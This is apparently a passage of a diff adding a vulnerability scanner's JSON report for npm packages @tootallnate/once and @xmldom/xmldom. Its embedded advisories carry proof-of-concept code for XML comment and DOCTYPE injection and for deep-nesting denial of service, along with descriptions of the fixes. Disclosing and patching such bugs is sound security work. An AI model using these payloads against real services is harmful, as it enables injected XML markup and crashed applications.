"LastModifiedDate": "2026-04-15T00:35:42.02Z" + }, + { + "VulnerabilityID": "CVE-2026-3449", + "VendorIDs": [ + "GHSA-vpq2-c234-7xj6" + ], + "PkgID": "@tootallnate/once@1.1.2", + "PkgName": "@tootallnate/once", + "PkgIdentifier": { + "PURL": "pkg:npm/%40tootallnate/once@1.1.2", + "UID": "31254e5ee78ef763" + }, + "InstalledVersion": "1.1.2", + "FixedVersion": "3.0.1", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-3449", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:704ddd6b90b90bcd039c39c4374a5015338748c0e25893761132d379dad69579", + "Title": "@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect control flow scoping with AbortSignal", + "Description": "Versions of the package @tootallnate/once before 3.0.1 are vulnerable to Incorrect Control Flow Scoping in promise resolving when AbortSignal option is used. The Promise remains in a permanently pending state after the signal is aborted, causing any await or .then() usage to hang indefinitely. This can cause a control-flow leak that can lead to stalled requests, blocked workers, or degraded application availability.", + "Severity": "LOW", + "CweIDs": [ + "CWE-705" + ], + "VendorSeverity": { + "ghsa": 1, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P", + "V3Score": 3.3, + "V40Score": 1.9 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 4 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-3449", + "https://github.com/TooTallNate/once", + "https://github.com/TooTallNate/once/commit/b9f43cc5259bee2952d91ad3cdbd201a82df448a", + "https://github.com/TooTallNate/once/issues/8", + "https://nvd.nist.gov/vuln/detail/CVE-2026-3449", + "https://security.snyk.io/vuln/SNYK-JS-TOOTALLNATEONCE-15250612", + "https://www.cve.org/CVERecord?id=CVE-2026-3449" + ], + "PublishedDate": "2026-03-03T05:17:25.017Z", + "LastModifiedDate": "2026-03-03T21:52:29.877Z" + }, + { + "VulnerabilityID": "CVE-2026-34601", + "VendorIDs": [ + "GHSA-wh4c-j3r5-mjhp" + ], + "PkgID": "@xmldom/xmldom@0.8.11", + "PkgName": "@xmldom/xmldom", + "PkgIdentifier": { + "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", + "UID": "f9e98e014475aea3" + }, + "InstalledVersion": "0.8.11", + "FixedVersion": "0.8.12, 0.9.9", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-34601", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:821a2d3faaeb49e19bc0a3ad11b036b9e537cdf7572bc0b774691ad8e2dab449", + "Title": "xmldom: xmldom: XML structure injection via CDATA terminator", + "Description": "xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) `DOMParser` and `XMLSerializer` module. In xmldom versions 0.6.0 and prior and @xmldom/xmldom prior to versions 0.8.12 and 0.9.9, xmldom/xmldom allows attacker-controlled strings containing the CDATA terminator ]]\u003e to be inserted into a CDATASection node. During serialization, XMLSerializer emitted the CDATA content verbatim without rejecting or safely splitting the terminator. As a result, data intended to remain text-only became active XML markup in the serialized output, enabling XML structure injection and downstream business-logic manipulation. This issue has been patched in xmldom version 0.6.0 and @xmldom/xmldom versions 0.8.12 and 0.9.9.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-91" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-34601", + "https://github.com/xmldom/xmldom", + "https://github.com/xmldom/xmldom/commit/2b852e836ab86dbbd6cbaf0537f584dd0b5ac184", + "https://github.com/xmldom/xmldom/releases/tag/0.8.12", + "https://github.com/xmldom/xmldom/releases/tag/0.9.9", + "https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp", + "https://nvd.nist.gov/vuln/detail/CVE-2026-34601", + "https://www.cve.org/CVERecord?id=CVE-2026-34601" + ], + "PublishedDate": "2026-04-02T18:16:31.933Z", + "LastModifiedDate": "2026-04-16T14:57:08.337Z" + }, + { + "VulnerabilityID": "CVE-2026-41672", + "VendorIDs": [ + "GHSA-j759-j44w-7fr8" + ], + "PkgID": "@xmldom/xmldom@0.8.11", + "PkgName": "@xmldom/xmldom", + "PkgIdentifier": { + "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", + "UID": "f9e98e014475aea3" + }, + "InstalledVersion": "0.8.11", + "FixedVersion": "0.8.13, 0.9.10", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41672", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:6496770dac62da2ed86a098fe21f3cd0f1a165bc140a78c2998df8f417b6d30d", + "Title": "xmldom has XML node injection through unvalidated comment serialization", + "Description": "## Summary\n\nThe package allows attacker-controlled comment content to be serialized into XML without validating or neutralizing comment breaking sequences. As a result, an attacker can terminate the comment early and inject arbitrary XML nodes into the serialized output.\n\n---\n\n## Details\n\nThe issue is in the DOM construction and serialization flow for comment nodes.\n\nWhen `createComment(data)` is called, the supplied string is stored as comment data through the generic character-data handling path. That content is kept as-is. Later, when the document is serialized, the serializer writes comment nodes by concatenating the XML comment delimiters with the stored `node.data` value directly.\n\nThat behavior is unsafe because XML comments are a syntax-sensitive context. If attacker-controlled input contains a sequence that closes the comment, the serializer does not preserve it as literal comment text. Instead, it emits output where the remainder of the payload is treated as live XML markup.\n\nThis is a real injection bug, not a formatting issue. The serializer already applies context-aware handling in other places, such as escaping text nodes and rewriting unsafe CDATA terminators. Comment content does not receive equivalent treatment. Because of that gap, untrusted data can break out of the comment boundary and modify the structure of the final XML document.\n\n---\n\n## PoC\n\n```js\nconst { DOMImplementation, DOMParser, XMLSerializer } = require('@xmldom/xmldom');\n\nconst doc = new DOMImplementation().createDocument(null, 'root', null);\n\ndoc.documentElement.appendChild(\n doc.createComment('--\u003e\u003cinjected attr=\"1\"/\u003e\u003c!--')\n);\n\nconst xml = new XMLSerializer().serializeToString(doc);\nconsole.log(xml);\n// \u003croot\u003e\u003c!----\u003e\u003cinjected attr=\"1\"/\u003e\u003c!----\u003e\u003c/root\u003e\n\nconst reparsed = new DOMParser().parseFromString(xml, 'text/xml');\nconsole.log(reparsed.documentElement.childNodes.item(1).nodeName);\n// injected\n```\n\n---\n\n## Impact\n\nAn application that uses the package to build XML from untrusted input can be made to emit attacker-controlled elements outside the intended comment boundary. That allows the attacker to alter the meaning and structure of generated XML documents.\n\nIn practice, this can affect any workflow that generates XML and then stores it, forwards it, signs it, or hands it to another parser. Realistic targets include XML-based configuration, policy documents, and message formats where downstream consumers trust the serialized structure.\n\n---\n\n## Disclosure\n\nThis vulnerability was publicly disclosed at 2026-04-06T11:25:07Z via [xmldom/xmldom#987](https://github.com/xmldom/xmldom/pull/987), which was subsequently closed without being merged.\n\n---\n\n## Fix Applied\n\n\u003e **⚠ Opt-in required.** Protection is not automatic. Existing serialization calls remain\n\u003e vulnerable unless `{ requireWellFormed: true }` is explicitly passed. Applications that pass\n\u003e untrusted data to `createComment()` or mutate comment nodes with untrusted input (via\n\u003e `appendData`, `insertData`, `replaceData`, `.data =`, or `.textContent =`) should audit all\n\u003e `serializeToString()` call sites and add the option.\n\n`XMLSerializer.serializeToString()` now accepts an options object as a second argument. When `{ requireWellFormed: true }` is passed, the serializer throws `InvalidStateError` before emitting a Comment node whose `.data` would produce malformed XML.\n\nOn `@xmldom/xmldom` ≥ 0.9.10, the full W3C DOM Parsing §3.2.1.4 check is applied: throws if `.data` contains `--` anywhere, ends with `-`, or contains characters outside the XML Char production.\n\nOn `@xmldom/xmldom` ≥ 0.8.13 (LTS), only the `--\u003e` injection sequence is checked. The `0.8.x` SAX parser accepts comments containing `--` (without `\u003e`), so throwing on bare `--` would break a previously-working round-trip on that branch. The `--\u003e` check is sufficient to prevent injection.\n\n### PoC — fixed path\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst doc = new DOMImplementation().createDocument(null, 'root', null);\ndoc.documentElement.appendChild(doc.createComment('--\u003e\u003cinjected attr=\"1\"/\u003e\u003c!--'));\n\n// Default (unchanged): verbatim — injection present\nconst unsafe = new XMLSerializer().serializeToString(doc);\nconsole.log(unsafe);\n// \u003croot\u003e\u003c!----\u003e\u003cinjected attr=\"1\"/\u003e\u003c!----\u003e\u003c/root\u003e\n\n// Opt-in guard: throws InvalidStateError before serializing\ntry {\n new XMLSerializer().serializeToString(doc, { requireWellFormed: true });\n} catch (e) {\n console.log(e.name, e.message);\n // InvalidStateError: The comment node data contains \"--\" or ends with \"-\" (0.9.x)\n // InvalidStateError: The comment node data contains \"--\u003e\" (0.8.x — only --\u003e is checked)\n}\n```\n\n### Why the default stays verbatim\n\nThe W3C DOM Parsing and Serialization spec §3.2.1.4 defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the spec explicitly permits serializing ill-formed comment content verbatim — this is also the behavior of browser implementations (Chrome, Firefox, Safari): `new XMLSerializer().serializeToString(doc)` produces the injection sequence without error in all major browsers.\n\nUnconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in `requireWellFormed: true` flag allows applications that require injection safety to enable strict mode without breaking existing deployments.\n\n### Residual limitation\n\nThe fix operates at serialization time only. There is no creation-time check in `createComment` — the spec does not require one for comment data. Any path that leads to a Comment node with `--` in its data (`createComment`, `appendData`, `.data =`, etc.) produces a node that serializes safely only when `{ requireWellFormed: true }` is passed to `serializeToString`.", + "Severity": "HIGH", + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", + "V40Score": 8.7 + } + }, + "References": [ + "https://github.com/xmldom/xmldom", + "https://github.com/xmldom/xmldom/commit/b397540889086da868c30c366ad5c220d1a750c7", + "https://github.com/xmldom/xmldom/commit/fda7cc313de30243fea35cada64e0bb12099c2a1", + "https://github.com/xmldom/xmldom/pull/987", + "https://github.com/xmldom/xmldom/releases/tag/0.8.13", + "https://github.com/xmldom/xmldom/releases/tag/0.9.10", + "https://github.com/xmldom/xmldom/security/advisories/GHSA-j759-j44w-7fr8" + ] + }, + { + "VulnerabilityID": "CVE-2026-41673", + "VendorIDs": [ + "GHSA-2v35-w6hq-6mfw" + ], + "PkgID": "@xmldom/xmldom@0.8.11", + "PkgName": "@xmldom/xmldom", + "PkgIdentifier": { + "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", + "UID": "f9e98e014475aea3" + }, + "InstalledVersion": "0.8.11", + "FixedVersion": "0.8.13, 0.9.10", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41673", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:836af0d1bc0c9bde54bf01f90bff1f3dcce11a7160e53ef1b64262f971e569fd", + "Title": "xmldom: Uncontrolled recursion in XML serialization leads to DoS", + "Description": "## Summary\n\nSeven recursive traversals in `lib/dom.js` operate without a depth limit. A sufficiently deeply\nnested DOM tree causes a `RangeError: Maximum call stack size exceeded`, crashing the application.\n\n**Reported operations:**\n- `Node.prototype.normalize()` — reported by @praveen-kv (email 2026-04-05) and @KarimTantawey (GHSA-fwmp-8wwc-qhv6, via `DOMParser.parseFromString()`)\n- `XMLSerializer.serializeToString()` — reported by @Jvr2022 (GHSA-2v35-w6hq-6mfw) and @KarimTantawey (GHSA-j2hf-fqwf-rrjf)\n\n**Additionally, discovered in research:**\n- `Element.getElementsByTagName()` / `getElementsByTagNameNS()` / `getElementsByClassName()` / `getElementById()`\n- `Node.cloneNode(true)`\n- `Document.importNode(node, true)`\n- `node.textContent` (getter)\n- `Node.isEqualNode(other)`\n\nAll seven share the same root cause: pure-JavaScript recursive tree traversal with no depth guard.\nA single deeply nested document (parsed successfully) triggers any or all of these operations.\n\n---\n\n## Details\n\n### Root cause\n\n`lib/dom.js` implements DOM tree traversals as depth-first recursive functions. Each level of\nelement nesting adds one JavaScript call frame. The JS engine's call stack is finite; once\nexhausted, a `RangeError: Maximum call stack size exceeded` is thrown. This error may not be\ncaught reliably at stack-exhaustion depths because the catch handler itself requires stack\nframes to execute — especially in async scenarios, where an uncaught `RangeError` inside a\ncallback or promise chain can crash the entire Node.js process.\n\nParsing a deeply nested document **succeeds** — the SAX parser in `lib/sax.js` is iterative.\nThe crash occurs during subsequent operations on the parsed DOM.\n\n### `Node.prototype.normalize()` — reported by @praveen-kv\n\n[`lib/dom.js:1296–1308`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L1296-L1308) (main):\n\n```js\nnormalize: function () {\n var child = this.firstChild;\n while (child) {\n var next = child.nextSibling;\n if (next \u0026\u0026 next.nodeType == TEXT_NODE \u0026\u0026 child.nodeType == TEXT_NODE) {\n this.removeChild(next);\n child.appendData(next.data);\n } else {\n child.normalize(); // recursive call — no depth guard\n child = next;\n }\n }\n},\n```\n\nCrash threshold (Node.js 18, default stack): ~10,000 levels.\n\n### `XMLSerializer.serializeToString()` — reported by @Jvr2022\n\n[`lib/dom.js:2790–2974`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L2790-L2974) (main):\nThe internal `serializeToString` worker recurses into child nodes at four call sites, each\npassing a `visibleNamespaces.slice()` copy. The per-frame allocation causes earlier stack\nexhaustion than `normalize()`.\n\nCrash threshold (Node.js 18, default stack): ~5,000 levels.\n\n### Additional recursive entry points\n\nAll five crash at ~10,000 levels on Node.js 18.\n\n| Function | Definition | Public API entry point(s) | Crash depth (Node.js 18) |\n|-----------------------------|----------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------|--------------------------|\n| `_visitNode` | [`lib/dom.js:1529`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L1529) | `getElementsByTagName()`, `getElementsByTagNameNS()`, `getElementsByClassName()`, `getElementById()` | ~10,000 levels |\n| `cloneNode` (module fn) | [`lib/dom.js:3037`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L3037) | `Node.prototype.cloneNode(true)` | ~10,000 levels |\n| `importNode` (module fn) | [`lib/dom.js:2975`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L2975) | `Document.prototype.importNode(node, true)` | ~10,000 levels |\n| `getTextContent` (inner fn) | [`lib/dom.js:3130`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L3130) | `node.textContent` (getter) | ~10,000 levels |\n| `isEqualNode` | [`lib/dom.js:1120`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L1120) | `Node.prototype.isEqualNode(other)` | ~10,000 levels |\n\nBoth active branches (`main` and `release-0.8.x`) are identically affected. The unscoped `xmldom`\npackage (≤ 0.6.0) carries the same recursive patterns from its initial commit.\n\n### Browser behavior\n\nTested with Chromium 147 (Playwright headless). Chromium's native C++ implementations of all\nseven DOM methods are **iterative** — they traverse the DOM without consuming JS call stack frames.\nAll seven succeed at depths up to 20,000 without any crash.\n\nWhen `@xmldom/xmldom` is bundled and run in a browser context the same recursive JS code executes\nunder the browser's V8 stack limit (~12,000–13,000 frames). The crash thresholds are similar to\nthose observed on Node.js 18 (~5,000 for `serializeToString`, ~10,000 for the remaining six).\n\nThe vulnerability is specific to xmldom's pure-JavaScript recursive implementation, not an\ninherent property of the DOM operations.\n\n---\n\n## PoC\n\n### `normalize()` (from @praveen-kv report, 2026-04-05)\n\n```js\nconst { DOMParser } = require('@xmldom/xmldom');\n\nfunction generateNestedXML(depth) {\n return '\u003croot\u003e' + '\u003ca\u003e'.repeat(depth) + 'text' + '\u003c/a\u003e'.repeat(depth) + '\u003c/root\u003e';\n}\n\nconst doc = new DOMParser().parseFromString(generateNestedXML(10000), 'text/xml');\ndoc.documentElement.normalize();\n// RangeError: Maximum call stack size exceeded\n```\n\n### `XMLSerializer.serializeToString()` (from GHSA-2v35-w6hq-6mfw)\n\n```js\nconst { DOMParser, XMLSerializer } = require('@xmldom/xmldom');\n\nconst depth = 5000;\nconst xml = '\u003ca\u003e'.repeat(depth) + '\u003c/a\u003e'.repeat(depth);\nconst doc = new DOMParser().parseFromString(xml, 'text/xml');\nnew XMLSerializer().serializeToString(doc);\n// RangeError: Maximum call stack size exceeded\n```\n\nThe other methods have been verified using similar pocs.\n\n---\n\n## Impact\n\nAny service that accepts attacker-controlled XML and subsequently calls any of the seven affected\nDOM operations can be forced into a reliable denial of service with a single crafted payload.\n\nThe immediate result is an uncaught `RangeError` and failed request processing. In deployments\nwhere uncaught exceptions terminate the worker or process, the impact can extend beyond a single\nrequest and disrupt service availability more broadly.\n\nNo authentication, special options, or invalid XML is required. A valid, deeply nested XML\ndocument is enough.\n\n---\n\n## Disclosure\n\nThe `normalize()` vector was publicly disclosed at 2026-04-06T11:25:07Z via\n[xmldom/xmldom#987](https://github.com/xmldom/xmldom/pull/987) (closed without merge).\n`serializeToString()` and the five additional recursive entry points were not mentioned in that PR.\n\n---\n\n## Fix Applied\n\nAll seven affected traversals have been converted from recursive to iterative implementations, eliminating call-stack consumption on deep trees.\n\n### `walkDOM` utility\n\nA new `walkDOM(node, context, callbacks)` utility is introduced. It traverses the subtree rooted at `node` in depth-first order using an explicit JavaScript array as a stack, consuming heap memory instead of call-stack frames. `context` is an arbitrary value threaded through the walk — each `callbacks.enter(node, context)` call returns the context to pass to that node's children, enabling per-branch state (e.g. namespace snapshots in the serializer). `callbacks.exit(node, context)` (optional) is called in post-order after all children have been visited.\n\nThe following six operations are re-implemented on top of `walkDOM`:\n\n| Operation | Public entry point(s) |\n|---|---|\n| `_visitNode` helper | `getElementsByTagName()`, `getElementsByTagNameNS()`, `getElementsByClassName()`, `getElementById()` |\n| `getTextContent` inner function | `node.textContent` getter |\n| `cloneNode` module function | `Node.prototype.cloneNode(true)` |\n| `importNode` module function | `Document.prototype.importNode(node, true)` |\n| `serializeToString` worker | `XMLSerializer.prototype.serializeToString()`, `Node.prototype.toString()`, `NodeList.prototype.toString()` |\n| `normalize` | `Node.prototype.normalize()` |\n\n`normalize` uses `walkDOM` with a `null` context and an `enter` callback that merges adjacent Text children of the current node before `walkDOM` reads and queues those children — so the surviving post-merge children are what the walker descends into.\n\n### Custom iterative loop for `isEqualNode`\n\nOne function cannot use `walkDOM`:\n\n**`Node.prototype.isEqualNode(other)`** (0.9.x only; absent from 0.8.x) compares two trees in parallel. It maintains an explicit stack of `{node, other}` node pairs — one node from each tree — which cannot be expressed with `walkDOM`'s single-tree visitor.\n\n### After the fix\n\nAll seven entry points succeed on trees of arbitrary depth without throwing `RangeError`. The original PoCs still demonstrate the vulnerability on unpatched versions and confirm the fix on patched versions.", + "Severity": "HIGH", + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + } + }, + "References": [ + "https://github.com/xmldom/xmldom", + "https://github.com/xmldom/xmldom/commit/17678a2a73ecbd1a2da90f3d47dc23da9cef81aa", + "https://github.com/xmldom/xmldom/commit/291257493cb0eb6980eda83b162a9c4e6d7d2597", + "https://github.com/xmldom/xmldom/commit/2d6d6916ed8a4c223db1f6d7560ab4544c465b0f", + "https://github.com/xmldom/xmldom/commit/430357c7b6333108856e917bf2367afe5ceb6f8a", + "https://github.com/xmldom/xmldom/commit/4845ef109221df0890825de2822fbe77afba3afe", + "https://github.com/xmldom/xmldom/commit/8834218c85ac2a4d757b9587c9028e67c2f7b6c3", + "https://github.com/xmldom/xmldom/commit/8b7cfd1491314abdc347261921d7334ff15f7112", + "https://github.com/xmldom/xmldom/commit/b0620383abc1df067f3ce1014c43ae1bc1161eeb", + "https://github.com/xmldom/xmldom/commit/e6edcab6bef5bcdba0b220bb35442aa72f452b84", + "https://github.com/xmldom/xmldom/releases/tag/0.8.13", + "https://github.com/xmldom/xmldom/releases/tag/0.9.10", + "https://github.com/xmldom/xmldom/security/advisories/GHSA-2v35-w6hq-6mfw" + ] + }, + { + "VulnerabilityID": "CVE-2026-41674", + "VendorIDs": [ + "GHSA-f6ww-3ggp-fr8h" + ], + "PkgID": "@xmldom/xmldom@0.8.11", + "PkgName": "@xmldom/xmldom", + "PkgIdentifier": { + "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", + "UID": "f9e98e014475aea3" + }, + "InstalledVersion": "0.8.11", + "FixedVersion": "0.8.13, 0.9.10", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41674", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:c3a3881def60c69753d530bb5f988ce7bb45ccddbc9e86671eadaede3d6f53db", + "Title": "xmldom has XML injection through unvalidated DocumentType serialization", + "Description": "## Summary\n\nThe package serializes `DocumentType` node fields (`internalSubset`, `publicId`, `systemId`) verbatim\nwithout any escaping or validation. When these fields are set programmatically to attacker-controlled\nstrings, `XMLSerializer.serializeToString` can produce output where the DOCTYPE declaration is\nterminated early and arbitrary markup appears outside it.\n\n---\n\n## Details\n\n`DOMImplementation.createDocumentType(qualifiedName, publicId, systemId, internalSubset)` validates\nonly `qualifiedName` against the XML QName production. The remaining three arguments are stored\nas-is with no validation.\n\nThe XMLSerializer emits `DocumentType` nodes as:\n\n```\n\u003c!DOCTYPE name[ PUBLIC pubid][ SYSTEM sysid][ [internalSubset]]\u003e\n```\n\nAll fields are pushed into the output buffer verbatim — no escaping, no quoting added.\n\n**`internalSubset` injection:** The serializer wraps `internalSubset` with ` [` and `]`. A value\ncontaining `]\u003e` closes the internal subset and the DOCTYPE declaration at the injection point.\nAny content after `]\u003e` in `internalSubset` appears outside the DOCTYPE in the serialized output as\nraw XML markup. Reported by @TharVid (GHSA-f6ww-3ggp-fr8h). Affected: `@xmldom/xmldom` ≥ 0.9.0\nvia `createDocumentType` API; 0.8.x only via direct property write.\n\n**`publicId` injection:** The serializer emits `publicId` verbatim after `PUBLIC` with no\nquoting added. A value containing an injected system identifier (e.g.,\n`\"pubid\" SYSTEM \"evil\"`) breaks the intended quoting context, injecting a fake SYSTEM entry\ninto the serialized DOCTYPE declaration. Identified during internal security research. Affected:\nboth branches, all versions back to 0.1.0.\n\n**`systemId` injection:** The serializer emits `systemId` verbatim. A value containing `\u003e`\nterminates the DOCTYPE declaration early; content after `\u003e` appears as raw XML markup outside\nthe DOCTYPE context. Identified during internal security research. Affected: both branches, all\nversions back to 0.1.0.\n\nThe parse path is safe: the SAX parser enforces the `PubidLiteral` and `SystemLiteral` grammar\nproductions, which exclude the relevant characters, and the internal subset parser only accepts a\nsubset it can structurally validate. The vulnerability is reachable only through programmatic\n`createDocumentType` calls with attacker-controlled arguments.\n\n---\n\n## Affected code\n\n**`lib/dom.js` — `createDocumentType` (lines 898–910):**\n\n```js\ncreateDocumentType: function (qualifiedName, publicId, systemId, internalSubset) {\n validateQualifiedName(qualifiedName); // only qualifiedName is validated\n var node = new DocumentType(PDC);\n node.name = qualifiedName;\n node.nodeName = qualifiedName;\n node.publicId = publicId || ''; // stored verbatim\n node.systemId = systemId || ''; // stored verbatim\n node.internalSubset = internalSubset || ''; // stored verbatim\n node.childNodes = new NodeList();\n return node;\n},\n```\n\n**`lib/dom.js` — serializer DOCTYPE case (lines 2948–2964):**\n\n```js\ncase DOCUMENT_TYPE_NODE:\n var pubid = node.publicId;\n var sysid = node.systemId;\n buf.push(g.DOCTYPE_DECL_START, ' ', node.name);\n if (pubid) {\n buf.push(' ', g.PUBLIC, ' ', pubid);\n if (sysid \u0026\u0026 sysid !== '.') {\n buf.push(' ', sysid);\n }\n } else if (sysid \u0026\u0026 sysid !== '.') {\n buf.push(' ', g.SYSTEM, ' ', sysid);\n }\n if (node.internalSubset) {\n buf.push(' [', node.internalSubset, ']'); // internalSubset emitted verbatim\n }\n buf.push('\u003e');\n return;\n```\n\n---\n\n## PoC\n\n### internalSubset injection\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n 'root',\n '',\n '',\n ']\u003e\u003cinjected/\u003e\u003c![CDATA['\n);\nconst doc = impl.createDocument(null, 'root', doctype);\nconst xml = new XMLSerializer().serializeToString(doc);\nconsole.log(xml);\n// \u003c!DOCTYPE root []\u003e\u003cinjected/\u003e\u003c![CDATA[]\u003e\u003croot/\u003e\n// ^^^^^^^^^^ injected element outside DOCTYPE\n```\n\n### publicId quoting context break\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n 'root',\n '\"injected PUBLIC_ID\" SYSTEM \"evil\"',\n '',\n ''\n);\nconst doc = impl.createDocument(null, 'root', doctype);\nconsole.log(new XMLSerializer().serializeToString(doc));\n// \u003c!DOCTYPE root PUBLIC \"injected PUBLIC_ID\" SYSTEM \"evil\"\u003e\u003croot/\u003e\n// quoting context broken — SYSTEM entry injected\n```\n\n### systemId injection\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n 'root',\n '',\n '\"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e',\n ''\n);\nconst doc = impl.createDocument(null, 'root', doctype);\nconsole.log(new XMLSerializer().serializeToString(doc));\n// \u003c!DOCTYPE root SYSTEM \"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e\u003e\u003croot/\u003e\n// \u003e in sysid closes DOCTYPE early; \u003cinjected/\u003e appears as sibling element\n```\n\n---\n\n## Impact\n\nAn application that programmatically constructs `DocumentType` nodes from user-controlled data and\nthen serializes the document can emit a DOCTYPE declaration where the internal subset is closed\nearly or where injected SYSTEM entities or other declarations appear in the serialized output.\n\nDownstream XML parsers that re-parse the serialized output and expand entities from the injected\nDOCTYPE declarations may be susceptible to XXE-class attacks if they enable entity expansion.\n\n---\n\n## Fix Applied\n\n\u003e **⚠ Opt-in required.** Protection is not automatic. Existing serialization calls remain\n\u003e vulnerable unless `{ requireWellFormed: true }` is explicitly passed. Applications that pass\n\u003e untrusted data to `createDocumentType()` or write untrusted values directly to a\n\u003e `DocumentType` node's `publicId`, `systemId`, or `internalSubset` properties should audit\n\u003e all `serializeToString()` call sites and add the option.\n\n`XMLSerializer.serializeToString()` now accepts an options object as a second argument. When `{ requireWellFormed: true }` is passed, the serializer validates the `DocumentType` node's `publicId`, `systemId`, and `internalSubset` fields before emitting the DOCTYPE declaration and throws `InvalidStateError` if any field contains an injection sequence:\n\n- **`publicId`**: throws if non-empty and does not match the XML `PubidLiteral` production (XML 1.0 [12])\n- **`systemId`**: throws if non-empty and does not match the XML `SystemLiteral` production (XML 1.0 [11])\n- **`internalSubset`**: throws if it contains `]\u003e` (which closes the internal subset and DOCTYPE declaration early)\n\nAll three checks apply regardless of how the invalid value entered the node — whether via `createDocumentType` arguments or a subsequent direct property write.\n\n### PoC — fixed path\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\nconst impl = new DOMImplementation();\n\n// internalSubset injection\nconst dt1 = impl.createDocumentType('root', '', '', ']\u003e\u003cinjected/\u003e\u003c![CDATA[');\nconst doc1 = impl.createDocument(null, 'root', dt1);\n\n// Default (unchanged): verbatim — injection present\nconsole.log(new XMLSerializer().serializeToString(doc1));\n// \u003c!DOCTYPE root []\u003e\u003cinjected/\u003e\u003c![CDATA[]\u003e\u003croot/\u003e\n\n// Opt-in guard: throws InvalidStateError\ntry {\n new XMLSerializer().serializeToString(doc1, { requireWellFormed: true });\n} catch (e) {\n console.log(e.name, e.message);\n // InvalidStateError: DocumentType internalSubset contains \"]\u003e\"\n}\n```\n\nThe guard also covers post-creation property writes:\n\n```js\nconst dt2 = impl.createDocumentType('root', '', '');\ndt2.systemId = '\"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e';\nconst doc2 = impl.createDocument(null, 'root', dt2);\nnew XMLSerializer().serializeToString(doc2, { requireWellFormed: true });\n// 